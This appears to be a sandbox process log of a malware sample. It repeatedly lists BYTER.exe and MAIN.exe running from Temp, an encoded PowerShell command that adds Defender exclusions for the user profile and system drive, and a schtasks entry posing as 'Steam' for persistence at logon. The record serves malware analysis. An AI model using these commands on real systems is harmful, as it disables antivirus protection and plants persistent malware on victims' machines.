"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4A67.tmp.bat""

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Users\Admin\AppData\Roaming\Steam.exe

"C:\Users\Admin\AppData\Roaming\Steam.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

